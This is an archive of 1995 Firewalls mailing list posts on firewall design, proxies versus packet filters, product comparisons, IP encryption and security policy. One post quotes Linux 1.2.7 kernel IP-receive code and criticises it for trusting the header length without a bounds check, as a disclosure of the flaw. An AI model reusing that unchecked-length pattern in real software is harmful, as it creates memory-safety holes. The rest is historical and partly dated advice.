David Maynard "Jim.Shaw" "Daniel O'Callaghan" ari@soscorp.com (Ari Shamash) Darren Reed Bob Beck __________________________________________________________ | Luis E. Mu~oz R. | PGP2.1 Key available via | | Internet: lem@usb.ve | `finger lem@jihad.usb.ve' | | NIC: LEM (lat), LM39 | | | uucp: sun!emsca!usb!lem |==============================| | Phone/Fax: 582-9431402 | These opinions are mine alone| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Tue May 2 18:45:25 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA00636 for firewalls-outgoing; Tue, 2 May 1995 18:15:24 -0700 Received: from noc1.mid.net (noc1.mid.net [198.247.250.15]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA00629 for ; Tue, 2 May 1995 18:15:18 -0700 Received: from jayhawk.mid.net (jayhawk.mid.net [198.247.250.21]) by noc1.mid.net (8.6.10/8.6.9) with ESMTP id UAA19152; Tue, 2 May 1995 20:15:35 -0500 Received: (from alan@localhost) by jayhawk.mid.net (8.6.10/8.6.9) id UAA09936; Tue, 2 May 1995 20:15:51 -0500 From: Alan Hannan Message-Id: <199505030115.UAA09936@jayhawk.mid.net> Subject: Re: Help with begining options? To: bwern@jax.jaxnet.com (Ben Wern) Date: Tue, 2 May 1995 20:15:51 -0500 (CDT) Cc: Firewalls@GreatCircle.COM In-Reply-To: <199505020700.DAA27248@jax.jaxnet.com> from "Ben Wern" at May 2, 95 03:00:55 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1851 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > This may not specifically be in the charter, but I'm asking anyways. I'm This wouldn't be the first time... ;) > The firewall should allow any outgoing traffic, but restrict incoming > traffic to ONLY SMTP to one machine inside the net. All other servers > (FTP, WWW, Etc. are in the unprotected network.) Of course you realize that by this method you make your entire internal subnet only as strong as that SMTP server. Just an observation. > Anyone care to offer thoughts, etc. for a new firewalls person? If both you and your company trust someone internal to implement this firewall, then TIS's Firewall Tool Kit (FWTK) is a good alternative. These quality tools can be used to create an effective firewall. Another option is to outsource the talent to build the firewall. While I cannot endorse this unilaterally, often this is an acceptable solution to a company limited by money. If you are looking to provide your company with a link that only allows incoming mail, then you have cut off all returning traffic except that. By your definition (which I think you misphrased) WWW, news, ftp would also be limited. If you develop a firewalling system that allows returning packets simply on the basis of the "ack" bit, then you are risking significant exposure. A proxy firewall is the best solution to this, which is why I'm a big fan of TIS and their product, which we resell. However, if you only want the 80 percent security, then plop the money down to one of the packet filtering vendors. Good luck. -- alan@mid.net, (402) 472-0241 (voice) Networked Systems Administrator (402) 472-0240 (fax) MIDnet, the United States Oldest Regional Internet Service Provider " They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety. " - Benjamin Franklin From firewalls-owner Tue May 2 19:09:03 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA01716 for firewalls-outgoing; Tue, 2 May 1995 18:50:20 -0700 Received: from explorer (explorer.ho.BoM.GOV.AU [134.178.8.120]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA01690 for ; Tue, 2 May 1995 18:49:59 -0700 Message-Id: <199505030149.SAA01690@miles.greatcircle.com> Received: from BoM.GOV.AU (localhost) by explorer with ESMTP (1.37.109.15/16.2) id AA183015811; Wed, 3 May 1995 01:50:12 GMT X-Mailer: exmh version 1.6 4/21/95 To: firewalls@greatcircle.com From: richard.jones@BoM.GOV.AU (Richard Jones) Reply-To: richard.jones@BoM.GOV.AU Subject: Some f/w capability questions. Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 03 May 1995 01:50:10 GMT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We're looking to buy a f/w system that will be fault-tolerant and provide several services, some of which are required to be high speed and low-latency. We cannot afford to place any service machines in the DMZ, due to inherent the risks of being unprotected, management issues and cost of new machines. I would appreciate if anyone (vendors or even installed system administrators) can inform me of the following for Gauntlet, BorderWare, Brimstone, Eagle, Firewall-1 and Interlock: 1. Redundancy / Fault tolerance. I need the services to stay available if something unforseen happens, like a bug in the software or a fault in the hardare. This is a Most Important Feature. Something like HP's Switchover system would be good. 2. Speed / Performance. I have seen claims on this list that Pentium firewalls run at T1 speeds (they're "fast enough" -- but fast enough for WHAT?). We have an E1 (2Mbit) link to the Internet, plus other services that bring the total up to about 3Mbits. I need to know if these firewalls can proxy/serve (not just run filtering) many (20+) telnet/rlogin sessions, some (10+) FTP sessions, many (several 1000+) WWW connections per day, NNTP, SMTP, X11, etc and keep a high-speed, low latency operationally critical service running as well. How do the highly-transparent services suffer when the firewall is heavily loaded by proxying or serving? 3. How many of these firewalls provide # of session rules for connections? I have only seen one firewall's (BorderWare) documentation that mentions it... 4. To keep the masses happy, we may need to provide some RPC support. Firewall-1 claims to keep state info - is this overrated, and should I just say no to these people? 5. Exactly what benefits does one achieve from running a proxy HTTP? NNTP? Gopher? Please reply to me, and I'll summarise. If anyone has any specific queries about our site's requirements for a firewall, please contact me. I figured this email was getting too long :) Richard. Richard Jones, Supercomputing Section at the Bureau of Meteorology, Australia. richard.jones@BoM.GOV.AU, MIME accepted. Work phone: +61-3-669-4539 From firewalls-owner Tue May 2 19:39:03 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA02562 for firewalls-outgoing; Tue, 2 May 1995 19:10:55 -0700 Received: from all.net (all.net [204.7.229.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA02557 for ; Tue, 2 May 1995 19:10:46 -0700 From: fc@all.net (Dr. Frederick B. Cohen) Received: by all.net (4.1/3.2.012693-Management Analytics); id AA03528 for firewalls@greatcircle.com; Tue, 2 May 95 22:06:46 EDT Message-Id: <9505030206.AA03528@all.net> Subject: Firewalls with distributed GUI management interfaces To: firewalls@greatcircle.com Date: Tue, 2 May 1995 22:06:45 -0400 (EDT) X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 891 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The (now) 3 products: - Brimstone from SOS - Firewall-1 - A soon-to-be-released product from Cohesive All claim to have GUIs that allow remote management of multiple firewalls and automated setting of most common options (what to pass from and to where, what to detect, how to respond, etc.). >From my limited conversations with them, none are perfect, but at least two are fairly well thought out. No verification done by experiment. -- ----------------- \Management /\/| 216-686-0090 - PO Box 1480, Hudson, OH 44236 \ /\/ | Check out info-security heaven and test your system \/\ /\/ | for known vulnerabilities (1st time for free) at URL: \/Analytics| (scans deeper than SATAN or ISS) http://all.net:8080 ----------------- Read "Protection and Security on the Information Superhighway" John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95 From firewalls-owner Tue May 2 20:03:23 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA03047 for firewalls-outgoing; Tue, 2 May 1995 19:29:02 -0700 Received: from gk_west.usps.gov (gk-west.usps.gov [198.120.14.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA03041 for ; Tue, 2 May 1995 19:29:00 -0700 Received: by gk_west.usps.gov (5.65/fma-120691); id AA19839; Tue, 2 May 95 19:29:24 -0700 Received: by RALSSW01.USPS.GOV (Soft*Switch Central V4L380P5) id 902227210095122FRALSSW01; 02 May 1995 21:27:21 GMT Message-Id: Date: 02 May 1995 21:27:21 GMT From: "Postmaster" Subject: DISTRIBUTION STATUS To: Firewalls@GreatCircle.COM Comment: MEMO 05.02.95 21.27 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk SMTP.FIREWAL1 DISTRIBUTION STATUS INFORMATION 05/02/95 21:27:0 ======================================================================= DISTRIBUTION ID: SMTP.FIREWAL1.8599 SUBJECT : Firewalls-Digest V4 #280 DATE SENT : 05/02/95 TIME SENT: 21:26:00 ======================================================================= YOUR MAIL WAS NOT DELIVERED FOR THE FOLLOWING REASON: SNADS STATUS : 000F EXPLANATION : SNADS SYSTEM ERROR ======================================================================= RECIPIENT : RANC006L.DDAY LAST NAME : DAY FIRST NAME : DONALD MIDDLE INITIAL : M NATIVE NAME : DONALD M DAY at RANC003L COUNTRY : ADMD : PRMD : ORGANIZATION : ORG UNIT 1 : ORG UNIT 2 : CCMAIL/RANC003L ORG UNIT 3 : CCMAIL ADDRESS ORG UNIT 4 : DDA : From firewalls-owner Tue May 2 21:19:03 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA04471 for firewalls-outgoing; Tue, 2 May 1995 20:52:30 -0700 Received: from ken.canbtimes.com.au (ken.canbtimes.com.au [203.5.63.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA04460 for ; Tue, 2 May 1995 20:52:13 -0700 Message-Id: <199505030352.UAA04460@miles.greatcircle.com> Received: by ken.canbtimes.com.au (1.37.109.11/16.2) id AA003183208; Wed, 3 May 1995 13:53:28 +1000 From: John Cougar Subject: Re: TRUST US and other hooui To: DanaNowell@corsof.com (Dana Nowell) (Dana Nowell) Date: Wed, 3 May 95 13:53:28 EST Cc: firewalls@GreatCircle.com In-Reply-To: <199505022144.OAA21577@miles.greatcircle.com>; from "Dana Nowell" at May 02, 95 5:42 pm Mailer: Elm [revision: 70.85.2.1] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ha! Now for MY two cents worth (is there such a denomination anymore?) > > > >The point is that it's much easier to evaluate the correctness of a > >stereo installation in a car than it is to evaluate whether a patch is > >"properly installed" and "compatible." I don't have any figures on the > >failure rate for stereo installations, but they can't possibly be as > >risky as software patching. I'd like to see the axiomatic algebra for proving the correctness of _any_ physical system ... Anyone? > > > >> > Also, the > >> > most likely failure modes decrease your enjoyment of your car but are > >> > unlikely to risk your life and safety. > >> > >> You mean like non-working turn signals? > > > >In a car, the problem was limited to the electrical system handling > >low wattage devices. It didn't affect the ignition and thus affect the > >car's mission critical behavior. Changes to security software are > ... cut ... Yeh. Right. So we don't have algorithms in cars, huh? What about EMS's and AntiLock Brake systems ... ETC. ? What do you guys DRIVE? You know, some brainiac over at Toy-Motor (read Toyota) (or was it Nis-san - read Dat-sun - ?) recently released a car with fibre routed comms. doing _all_ essential management. Now I ask you ... where is the redundancy now? > > > > I suppose when the auto dealer swaps out the computer controller that > controls the throttle, timing, etc. via software in the latest and greatest > revision PROM I'm also at low risk :-). In today's environment just about > ... cut ... > someone has used their toolkit to build a 911 emergency response system. > Face it software is everywhere, if you want to worry about it or be scared > its usually the best you can do in the practical world. > ... cut ... Here, here. Good (w)Rap, Dana! -- ---------------------------------------------------------------------- John Cougar | email: johnc@canbtimes.com.au Systems Consultant | voice: ++ 61 6 280 2128 Australian Technology Resources | mobile: ++ 61 018 488867 | fax: ++ 61 6 280 5420 ---------------------------------------------------------------------- From firewalls-owner Tue May 2 21:46:54 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA05401 for firewalls-outgoing; Tue, 2 May 1995 21:35:29 -0700 Received: from wicked.neato.org (wicked.neato.org [198.70.96.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA05396 for ; Tue, 2 May 1995 21:35:26 -0700 Received: (from george@localhost) by wicked.neato.org (8.6.12/8.6.12) id VAA17836; Tue, 2 May 1995 21:36:10 -0700 Date: Tue, 2 May 1995 21:36:10 -0700 From: George Mullins Message-Id: <199505030436.VAA17836@wicked.neato.org> To: Alan Hannan Cc: bwern@jax.jaxnet.com (Ben Wern), Firewalls@GreatCircle.COM Subject: Re: Help with begining options? In-Reply-To: <199505030115.UAA09936@jayhawk.mid.net> References: <199505020700.DAA27248@jax.jaxnet.com> <199505030115.UAA09936@jayhawk.mid.net> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Alan Hannan writes: > > The firewall should allow any outgoing traffic, but restrict incoming > > traffic to ONLY SMTP to one machine inside the net. All other servers > > (FTP, WWW, Etc. are in the unprotected network.) > > Of course you realize that by this method you make your entire internal > subnet only as strong as that SMTP server. Just an observation. And a wrong observation. While I would suggest using smap or sendmail on a machine on a DMZ network, if the only incoming traffic is restricted to SMTP, what is the attacker going to do that they couldn't do with any other type of firewall setup. Mail will be passed in any design. > If you are looking to provide your company with a link that only > allows incoming mail, then you have cut off all returning traffic > except that. By your definition (which I think you misphrased) > WWW, news, ftp would also be limited. This is simply not the case. You can allow only incoming smtp traffic while allowing full access out - WWW, news, telnet and ftp would NOT be limited. > If you develop a firewalling system that allows returning packets > simply on the basis of the "ack" bit, then you are risking > significant exposure. I agree, sort of. I don't think that there is "significant" exposure, but trusting the ack bit is by no means fool-proof. I believe that there could be ways to gain access using this. > A proxy firewall is the best solution to this, which is why I'm a > big fan of TIS and their product, which we resell. However, if you > only want the 80 percent security, then plop the money down to one > of the packet filtering vendors. It isn't the BEST solution. There is no BEST solution. Proxy servers fit well into some environments, packet filters into others and "smart" packet filters into others. I could answer your statement as "if you only want 80 percent of the performance with no more security plop your money down with someone willing to install a proxy server firewall." George From firewalls-owner Tue May 2 22:39:04 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA06426 for firewalls-outgoing; Tue, 2 May 1995 22:18:27 -0700 Received: from jax.jaxnet.com (jax.jaxnet.com [204.183.221.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA06421 for ; Tue, 2 May 1995 22:18:23 -0700 Received: from slip13.unf.edu (jax.jaxnet.com [204.183.221.4]) by jax.jaxnet.com (8.6.9/8.6.9) with SMTP id BAA09422; Wed, 3 May 1995 01:23:13 -0400 Date: Wed, 3 May 1995 01:23:13 -0400 Message-Id: <199505030523.BAA09422@jax.jaxnet.com> X-Sender: bwern@jax.jaxnet.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: George Mullins From: bwern@jax.jaxnet.com (Ben Wern) Subject: Re: Help with begining options? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Of course you realize that by this method you make your entire internal > > subnet only as strong as that SMTP server. Just an observation. >And a wrong observation. While I would suggest using smap or sendmail >on a machine on a DMZ network, if the only incoming traffic is >restricted to SMTP, what is the attacker going to do that they >couldn't do with any other type of firewall setup. Mail will be >passed in any design. That was my thinking as well. > > If you develop a firewalling system that allows returning packets > > simply on the basis of the "ack" bit, then you are risking > > significant exposure. >I agree, sort of. I don't think that there is "significant" exposure, >but trusting the ack bit is by no means fool-proof. I believe that >there could be ways to gain access using this. True enough. The idea in my head whilst developing this was to do the most with the least amount of money (since that's what they're going to give me), and then try like heck to get the funds to upgrade the firewall to a fuller solution later. > > A proxy firewall is the best solution to this, which is why I'm a My understanding is that using a filter on the ip layer (like FWTK would provide), relied on ack packets, which could be forged. A proxy takes care of that problem, and would allow me to allow those services to only be originated from within the internal network, correct? Sorry for the no doubt easy questions, but I'm struggling to learn this quickly. :) Thanks for the help all! Ben Wern bwern@jaxnet.com | PGP Key available by Finger! bwern@pathtech.com| PGP Mail gets priority! bwern@unf6.edu | Ask for it by name! "I used to get disgusted, but now I just get amused" From firewalls-owner Tue May 2 23:05:02 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA06419 for firewalls-outgoing; Tue, 2 May 1995 22:18:21 -0700 Received: from jax.jaxnet.com (jax.jaxnet.com [204.183.221.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA06414 for ; Tue, 2 May 1995 22:18:18 -0700 Received: from slip13.unf.edu (jax.jaxnet.com [204.183.221.4]) by jax.jaxnet.com (8.6.9/8.6.9) with SMTP id BAA09416; Wed, 3 May 1995 01:23:07 -0400 Date: Wed, 3 May 1995 01:23:07 -0400 Message-Id: <199505030523.BAA09416@jax.jaxnet.com> X-Sender: bwern@jax.jaxnet.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Alan Hannan From: bwern@jax.jaxnet.com (Ben Wern) Subject: Re: Help with begining options? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > This wouldn't be the first time... ;) Same as it ever was.. :) >> The firewall should allow any outgoing traffic, but restrict incoming >> traffic to ONLY SMTP to one machine inside the net. > Of course you realize that by this method you make your entire internal >subnet only as strong as that SMTP server. Just an observation. How so? The proxy server should be limiting traffic that is coming into the internal subnet to a) one machine and b) only SMTP packets. At that point, I would think that it would only be open to SMTP based attacks. Yes/No? > If both you and your company trust someone internal to implement this >firewall, then TIS's Firewall Tool Kit (FWTK) is a good alternative. Unfortunatly, I'm our company's only in-house person with administration experience on a UNIX box (yes, sad but true.) Which means that I'm also the only person available to set this up, and while I've got some unix behind me, I've never set up a firewall before, and wouldn't trust my own setup further than I could see it. As far as TIS goes, I'm more than willing to give it a try. Am I correct in thinking that the kit provides for both IP level blocking and proxy server stuff? (re: I could lock off access as I described previously.. ) >If you develop a firewalling system that allows returning packets simply on the >basis of the "ack" bit, then you are risking significant exposure. A proxy >firewall is the best solution to this, That's very true. Unfortunatly, with no budget (well... close to no budget) for an entire internet installation, I don't know if I can finagle another 10k for the full product. My hope is to get a reasonable amount of security, and then try to demonstrate the need for more (once we have the network connection up and running.) At that point, it would just require switching the software, which would be simple enough. (well, compared to the whole install that is. :) ) Nice quote, BTW. :) Ben Wern bwern@jaxnet.com | PGP Key available by Finger! bwern@pathtech.com| PGP Mail gets priority! bwern@unf6.edu | Ask for it by name! "I used to get disgusted, but now I just get amused" From firewalls-owner Wed May 3 02:11:00 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA18632 for firewalls-outgoing; Wed, 3 May 1995 01:54:42 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA18625 for ; Wed, 3 May 1995 01:54:34 -0700 Message-Id: <199505030854.BAA18625@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA183941388; Wed, 3 May 1995 18:56:28 +1000 From: Darren Reed Subject: Re: Linux as multi-homed firewall... (fwd) To: firewalls@greatcircle.com Date: Wed, 3 May 1995 18:56:28 +1000 (EST) X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 5015 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I posted this mail elsewhere, and I'm doing it again here for user education. Sorry to those who see it twice. Maybe I should/could post it to bugtraq (even instead of), but the point I'm trying to make is one centred on bugs, but on choice of software for firewalls and the quality thereof. Someone who uses linux might want to file a bug report if they think it's serious enough. Oh, btw, if you're using Linux because of the IPFIREWALL stuff it has built in, think again. It is *NOT* being done correctly here. Maybe someone should sit down and take a good close look at Linux for us... Cheers, Darren In some mail from Darren Reed, they said: >From darrenr@vitruvius.arbld.unimelb.edu.au Wed May 3 12:56:11 EST 1995 From: Darren Reed Message-Id: <199505030252.MAA01552@vitruvius.arbld.unimelb.EDU.AU> Subject: Re: Linux as multi-homed firewall... Date: Wed, 3 May 1995 12:52:25 +1000 (EST) In some email I received from Marco Pauck, they wrote: > > [Sorry if this redundant but I think that my first message didn't made it.] > > > CAUTION: The last time I looked (1.1.99 I think) at the Linux kernel, there > > were still bugs which could be fatal in the IP code. If you > > can, change to using either NetBSD or FreeBSD (in that order). > > Linux is _not_ a mature operating system and I consider it > > unsuitable for serious firewall use. > > Could you please give some more information about what you consider > 'fatal bugs'? You're familiar with the problems of not doing bounds checking with arrays and things of static size in nature like IP packets, right ? Imagine if your kernel thought it had a 1024 byte packet when it had only received 20 bytes. What do _you_ think would happen, hmm ? Now, since people (who typically run Linux) have been so stubborn about there not being a bug, I'll cut and paste the segment so you can see for yourselves. The bug is, as far as I'm concerned, plain to see. Maybe Linux does something that I'm missing...but I doubt it. NOTE: *I* DON'T USE LINUX and I don't care a single bit for it. If bugs this major can survive for so long and nobody else has bothered to read the code and compare it with what else exists, then, in my opinion, that doesn't speak too highly for it being used in environments such as firewalls. But that's just IMO, of course. Maybe Linux should get a clue and just import as much as they can of the TCP/IP code from 4.4-Lite. Darren p.s. Since linux users are being just as stubborn in other mailing lists, I'll probably repost this there too for their enlightenment. p.p.s Sorry toolkit users for this interruption, but this has gone on long enough. Linux 1.2.7 linux/net/inet/ip.c: [...] ip_rcv(...) [...] if (skb->lenihl<5 || iph->version != 4 || ip_fast_csum((unsigned char *)iph, iph->ihl) !=0) { ip_statistics.IpInHdrErrors++; kfree_skb(skb, FREE_WRITE); return(0); } /* * See if the firewall wants to dispose of the packet. */ #ifdef CONFIG_IP_FIREWALL if ((err=ip_fw_chk(iph,dev,ip_fw_blk_chain,ip_fw_blk_policy, 0))!=1) { if(err==-1) icmp_send(skb, ICMP_DEST_UNREACH, ICMP_PORT_UNREACH, 0, dev); kfree_skb(skb, FREE_WRITE); return 0; } #endif /* * Our transport medium may have padded the buffer out. Now we know it * is IP we can trim to the true length of the frame. */ skb->len=ntohs(iph->tot_len); [...] NetBSD-current (OR any other 4.4-Lite based system) : /sys/netinet/ip_input.c: [...] ipintr() [...] /* * If no IP addresses have been set yet but the interfaces * are receiving, can't do anything with incoming packets yet. */ if (in_ifaddr == NULL) goto bad; ipstat.ips_total++; if (m->m_len < sizeof (struct ip) && (m = m_pullup(m, sizeof (struct ip))) == 0) { ipstat.ips_toosmall++; goto next; } ip = mtod(m, struct ip *); if (ip->ip_v != IPVERSION) { ipstat.ips_badvers++; goto bad; } hlen = ip->ip_hl << 2; if (hlen < sizeof(struct ip)) { /* minimum header length */ ipstat.ips_badhlen++; goto bad; } if (hlen > m->m_len) { if ((m = m_pullup(m, hlen)) == 0) { ipstat.ips_badhlen++; goto next; } ip = mtod(m, struct ip *); } if (ip->ip_sum = in_cksum(m, hlen)) { ipstat.ips_badsum++; goto bad; } /* * Convert fields to host representation. */ NTOHS(ip->ip_len); if (ip->ip_len < hlen) { ipstat.ips_badlen++; goto bad; } NTOHS(ip->ip_id); NTOHS(ip->ip_off); /* * Check that the amount of data in the buffers * is as at least much as the IP header would have us expect. * Trim mbufs if longer than we expect. * Drop packet if shorter than we expect. */ if (m->m_pkthdr.len < ip->ip_len) { ipstat.ips_tooshort++; goto bad; } if (m->m_pkthdr.len > ip->ip_len) { if (m->m_len == m->m_pkthdr.len) { m->m_len = ip->ip_len; m->m_pkthdr.len = ip->ip_len; } else m_adj(m, ip->ip_len - m->m_pkthdr.len); } [...] From firewalls-owner Wed May 3 04:09:22 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA21665 for firewalls-outgoing; Wed, 3 May 1995 03:52:36 -0700 Received: from ashley.business.uwo.ca (ashley.business.uwo.ca [129.100.22.27]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA21660 for ; Wed, 3 May 1995 03:52:32 -0700 Received: (from a5charti@localhost) by ashley.business.uwo.ca (8.6.8/8.6.6) id GAA17097; Wed, 3 May 1995 06:52:38 -0400 From: Alex Chartier Message-Id: <199505031052.GAA17097@ashley.business.uwo.ca> Subject: Re: Firewalls-Digest V4 #279 To: long-morrow@CS.YALE.EDU (H Morrow Long) Date: Wed, 3 May 1995 06:52:37 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <199505021540.AA28630@SPARKY.CF.CS.YALE.EDU> from "H Morrow Long" at May 2, 95 11:40:50 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1507 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > > Dear Fellow Firewallers, > > > > Does anybody know of a firewall other than TIS's Gauntlet or Raptor's > > Eagle/Eaglet that does IP encryption? (This is where the TCP(UDP)/IP > > packet is encrypted and a destination IP address preprended for another > > firewall across the Internet. Once received at the destination > > firewall, the encrypted packet is decrypted and sent to the appropraite > > host) I am not asking this due to problems with TIS or Raptor, but as > > a result of trying to complete some research into this area. > > > [snipped bit about Mornigstar] > NSC (Network Systems Corporation) has a router that can encrypt the body > of IP datagrams but leave the IP headers unencrypted so that they may be ^^^^^^^^^^^^^^^^^^^^^^ Actually, the entire datagram including IP headers is encrypted and encapsulated in another datagram with an address of the end point router. In this way an eavesdropper will know only that the two routers are talking, nothing about the end stations. And before you ask, packet frag and defrag capabilities are built in, however, if you also run compression it's likely that datagram fragmentation will not be required. The compression is done before the encryption. > routed over an internet. The feature that implements this on their > router is called DPF for Data Privacy Facility. > > You can find out more about it at the URL http://www.network.com/. > > - Morrow > > From firewalls-owner Wed May 3 05:16:34 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA22542 for firewalls-outgoing; Wed, 3 May 1995 04:37:48 -0700 Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA22535 for ; Wed, 3 May 1995 04:37:44 -0700 Received: from rssi by relay1.UU.NET with SMTP id QQyocs16193; Wed, 3 May 1995 07:38:02 -0400 Received: from pail.rssi.com by rssi (4.1/SMI-4.1) id AA13933; Wed, 3 May 95 07:35:46 EDT Received: by pail.rssi.com (5.0/SMI-SVR4) id AA04205; Wed, 3 May 1995 07:37:12 +0500 Date: Wed, 3 May 1995 07:37:12 +0500 From: bvvanor@rssi.rssi.com (Brad VanOrden) Message-Id: <9505031137.AA04205@pail.rssi.com> To: Firewalls@GreatCircle.COM Cc: pstingley@smtpgate.ssmc.noaa.gov Subject: IP Encryption Content-Length: 546 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Patrick Stingley asked about IP encryption firewalls. I've been working recently with a device made by Wang that performs this function. It is called a TIU. It basically secures everything behind it by encrypting all the outgoing datagrams and placing a new header on each stating that it is the source. It can only talk to other TIUs. Traffic on the unsecure network looks like it is only between the two TIUs. If anyone is interested, I can get you the full name of the device and a POC. Regards, Brad Van Orden Rapid Systems Solutions From firewalls-owner Wed May 3 05:45:35 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA23449 for firewalls-outgoing; Wed, 3 May 1995 05:19:09 -0700 Received: from snmpmgr.state.tn.us (snmpmgr.state.tn.us [170.142.1.74]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA23443 for ; Wed, 3 May 1995 05:19:06 -0700 Received: from langate.tnet.state.tn.us (langate.state.tn.us) by snmpmgr.state.tn.us with SMTP id AA29278 (5.67b/IDA-1.5 for ); Wed, 3 May 1995 07:14:18 -0500 Received: from tn01-Message_Server by langate.tnet.state.tn.us with Novell_GroupWise; Wed, 03 May 1995 07:23:45 -0500 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Wed, 03 May 1995 07:20:23 -0500 From: "Samuel T. Baker" To: firewalls@greatcircle.com Subject: PC site security Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Christopher J. Calabrese > Network Security Architect > Novell Information Services & Technology, Summit,NJ > cjc@summit.novell.com > > PC clients that are visible to the world don't currently > constitute a security problem I believe this should be understood with the caveat that *no* packages with daemons for telnet, ftp, ... are installed on the PC nor is the PC running server software such as X-windows. > - - Don't rely on your security policy to keep users > from installing software that will compromise your site. > They may install software they don't even _know_ is > a security risk. IMHO the vast majority of NetWare LAN Administrators (perhaps not CNEs) are also unaware of how easy it is to install software packages that will compromise a site with daemons. Samuel T. Baker Tennessee Treasury Department sbaker@mail.state.tn.us 615-532-8026 From firewalls-owner Wed May 3 06:10:06 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA23670 for firewalls-outgoing; Wed, 3 May 1995 05:27:54 -0700 Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA23661 for ; Wed, 3 May 1995 05:27:50 -0700 Received: from rssi by relay1.UU.NET with SMTP id QQyocv22448; Wed, 3 May 1995 08:28:10 -0400 Received: from pail.rssi.com by rssi (4.1/SMI-4.1) id AA14118; Wed, 3 May 95 08:25:54 EDT Received: by pail.rssi.com (5.0/SMI-SVR4) id AA04391; Wed, 3 May 1995 08:27:20 +0500 Date: Wed, 3 May 1995 08:27:20 +0500 From: bvvanor@rssi.rssi.com (Brad VanOrden) Message-Id: <9505031227.AA04391@pail.rssi.com> To: firewalls@greatcircle.com Cc: casares@ix.netcom.com, s0ujgg@pacific.fnma.COM Subject: Re: Policies Content-Length: 1019 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Joe Wrote: >Our organization is in need of a policy/standard for future Internet >connection. Would anyone out there be willing to share example >policies that they might have in place. Or provide pointers online >where examples might exist. Michael Wrote: >Our organization is in the same boat. Are there any outlines available? I hope both are asking for copies to see if there might be any points they missed, or to see how someone else worded a particular subject. A security policy is a management statement based on a thorough analysis. You need to identify for management the vulnerabilities of your systems and networks; their real and perceived threats; and the available countermeasures to those threats. Once management has this information, it can start asking: "OK, if we leave ourselves vulnerable to this threat, what will it cost us?" "What will it cost to impliment a countermeasure?" From then on , it is a cost-benefit decision. My two cents worth. Brad Van Orden Rapid Systems Solutions From firewalls-owner Wed May 3 06:51:36 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA24832 for firewalls-outgoing; Wed, 3 May 1995 06:05:58 -0700 Received: from mwunix.mitre.org (mwunix.mitre.org [128.29.154.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA24827 for ; Wed, 3 May 1995 06:05:52 -0700 